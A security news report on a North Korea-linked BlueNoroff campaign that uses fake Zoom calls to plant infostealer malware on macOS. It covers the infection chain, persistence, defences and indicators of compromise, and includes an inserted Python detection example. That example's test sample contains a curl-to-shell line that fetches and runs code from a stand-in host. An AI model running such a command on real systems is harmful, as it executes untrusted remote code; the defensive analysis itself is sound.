BlueNoroff Hackers Leverage Zoom App to Spread Infostealer Malware in Sophisticated Cyberattacks

The Field Effect Analysis team has uncovered a highly sophisticated cyberattack campaign tied to the North Korea-aligned BlueNoroff advanced persistent threat (APT) group, where actors weaponize the Zoom videoconferencing platform as a vector for delivering infostealer malware.

The campaign, targeting industries linked to cryptocurrency and online gambling, underscores the evolving technical prowess of financially motivated threat actors operating under the broader Lazarus Group umbrella.

Technical Attack Overview

Technical analysis reveals that the operation begins with elaborate social engineering that combines impersonation of trusted contacts (achieved through credential compromise) with accurate emulation of Zoom branding.

Victims receive invites to Zoom meetings with seemingly legitimate contacts, only to be exposed to malicious prompts during the call.

For example, during a May 28, 2025 attack on a Canadian online gambling provider, the threat actor induced the victim to execute an AppleScript task masquerading as an “audio repair tool.”

Although the script appeared benign, it concealed a payload within thousands of blank lines, ultimately downloading and executing secondary malware from the rogue domain zoom-tech[.]us.

[Figure: Zoom SDK Update script]

The infection chain is multi-stage:

  • An initial OSA (Open Scripting Architecture) script downloads a secondary shell script, using unique target identifiers for precision targeting and tracking.
  • Victims are manipulated into entering their local system credentials, which are immediately exfiltrated to external attacker infrastructure.
  • Subsequent payloads fetch and execute further implants including an infostealer binary enabling deep system compromise.
  • Persistence is maintained via LaunchDaemon bootstrap configurations, set with administrator privileges, and camouflaged under legitimate-sounding names (e.g., com.apple.security.update).
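As an added example (not code from the article or from Field Effect), the following Python checks two of the traits described above: a script whose payload is buried behind thousands of blank lines, and a LaunchDaemon plist that borrows an Apple-style label such as com.apple.security.update while launching a program from a staging path. The blank-line threshold, the path lists and the sample inputs are constructed assumptions.

```python
"""Two host-side heuristics for artefacts of the kind this campaign leaves.
flag_padded_script: OSA/AppleScript text whose payload sits behind a long run of
blank lines.  flag_launchdaemon: a launchd plist with an Apple-looking label that
runs a program from a non-Apple or staging path.  All thresholds, path lists and
sample inputs below are constructed assumptions, not values from the report."""
import plistlib
import re

BLANK_RUN_THRESHOLD = 500  # assumption: legitimate scripts do not pad this much
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/",
                          "/usr/bin/", "/Library/Apple/")
STAGING_PATH_RE = re.compile(r"^/(Users/Shared|tmp|private/tmp|Library/RestoreKey)/")

def flag_padded_script(text, threshold=BLANK_RUN_THRESHOLD):
    """Return (longest_blank_run, suspicious). suspicious is True when a run of
    at least `threshold` blank lines is followed by more script content."""
    longest = run = 0
    suspicious = False
    for line in text.splitlines():
        if line.strip() == "":
            run += 1
            continue
        if run >= threshold:        # code appears after the padding
            suspicious = True
        longest, run = max(longest, run), 0
    return max(longest, run), suspicious

def flag_launchdaemon(plist_bytes):
    """Return the reasons a launchd plist looks like masquerading persistence."""
    p = plistlib.loads(plist_bytes)
    label = p.get("Label", "")
    program = p.get("Program") or (p.get("ProgramArguments") or [""])[0]
    reasons = []
    if label.startswith("com.apple.") and not program.startswith(APPLE_PROGRAM_PREFIXES):
        reasons.append(f"Apple-style label {label!r} runs non-Apple program {program!r}")
    if STAGING_PATH_RE.match(program):
        reasons.append(f"program lives in a staging path: {program!r}")
    if p.get("RunAtLoad") and p.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive, typical of implant persistence")
    return reasons

# Constructed samples, not real campaign artefacts.
PADDED_SCRIPT = ('display dialog "Repairing audio..."\n' + "\n" * 3000
                 + 'do shell script "curl -s https://example.invalid/u | sh"\n')
SUSPECT_PLIST = plistlib.dumps({"Label": "com.apple.security.update",
    "ProgramArguments": ["/Library/RestoreKey/com.apple.siri.updater"],
    "RunAtLoad": True, "KeepAlive": True})
BENIGN_PLIST = plistlib.dumps({"Label": "com.apple.foo",
    "Program": "/usr/libexec/foo", "RunAtLoad": True})
```

Run the same checks over every plist under /Library/LaunchDaemons and over any script a user was asked to execute during a call; a hit on either heuristic is a trigger for pulling the host into incident response, not proof on its own.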

The malware employs extensive anti-forensics, such as rapid data exfiltration even before the full payload is installed and prompt deletion of temporary artifacts.

Key data targeted includes macOS Keychain files, browser credentials (notably from Chrome and Brave, favored by cryptocurrency users), cookies, and history.

Moreover, reconnaissance scripts gather detailed endpoint and network context, furthering post-exploitation objectives.

Infrastructure and Attribution

According to the report, the command-and-control (C2) infrastructure shows a pattern of Zoom-impersonating domains and rapid-fire domain registrations, often linked via WHOIS records to a common operator.

Analysis ties these domains to BlueNoroff/APT38, notorious for high-value cryptocurrency and financial sector targeting.

Infrastructure overlaps, such as use of Ukrainian security tool GitHub repositories to mask traffic and numerous lookalike domains, indicate a high degree of operational sophistication.

Defending against this campaign requires layered controls:

  • Restrict execution of unauthorized scripts and binaries, leveraging macOS Gatekeeper and System Integrity Protection (SIP).
  • Deploy Managed Detection and Response (MDR) and EDR platforms to spotlight suspicious scripting behavior, unauthorized credential access, creation of persistence mechanisms, and abnormal network egress (e.g., suspicious curl or rsync activity).
  • Enforce organization-wide policies prohibiting spontaneous technical support prompts and encourage verification of all IT assistance requests.
  • Conduct ongoing user training and red-teaming exercises to reinforce vigilance against video-call-based social engineering.

The campaign is a prime example of state-sponsored actors embedding themselves seamlessly within the workflows of legitimate business tools to maximize trust exploitation and dwell time, with the explicit intent of financial data theft and subsequent monetization through cryptocurrency assets.

Indicators of Compromise (IoCs)

| Type | Value / Hash / Path | Description |
|---|---|---|
| File | /Library/RestoreKey/com.apple.siri.updater | Malware implant |
| File Hash | MD5: 032E3E9A09F58A5B776C7374FC66D822 | |
| File Hash | SHA256: 036CA0A9D6A87E811F96F3AAADD8D0506954716CDB3B56915FC20859F1363C2F | |
| File | /Users/Shared/com.apple.sysd | Infostealer stage |
| File Hash | MD5: 1653D75D579872FADEC1F22CF7FEE3C0 | |
| File Hash | SHA256: 81612CAB25C707A4C5D12BB21FF5F87386FB52DCD0A12BBD063A9B4B11F2DF14 | |
| File | /Users/Shared/.u8xLja | Arbitrary loader component |
| File | /tmp/icloud_helper | Credential harvester |
| File Hash | SHA256: 5B6CE5E4AB8805884E497B53E57E05BE8B2AB07C87DADCBDCE137AC7DF025690 | |
| Domain | zoom-tech[.]us | Malicious download and C2 |
| Domain | ajayplamingo[.]com | C2 infrastructure |
| Domain | zmwebsdk[.]com | Data exfiltration endpoint |
| IP | 23.254.203[.]244 | C2 server |
| File | /Library/LaunchDaemons/com.apple.security.update.plist | Persistence mechanism |
| File | /Users//Library/Application Support/CloudStore | Staging location for exfiltration |
| File | /Users/Shared/.pwd | Stolen credentials |
| Additional Domains | Numerous Zoom lookalike domains (see report for full listing) | Used across campaign for staging and impersonation |


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
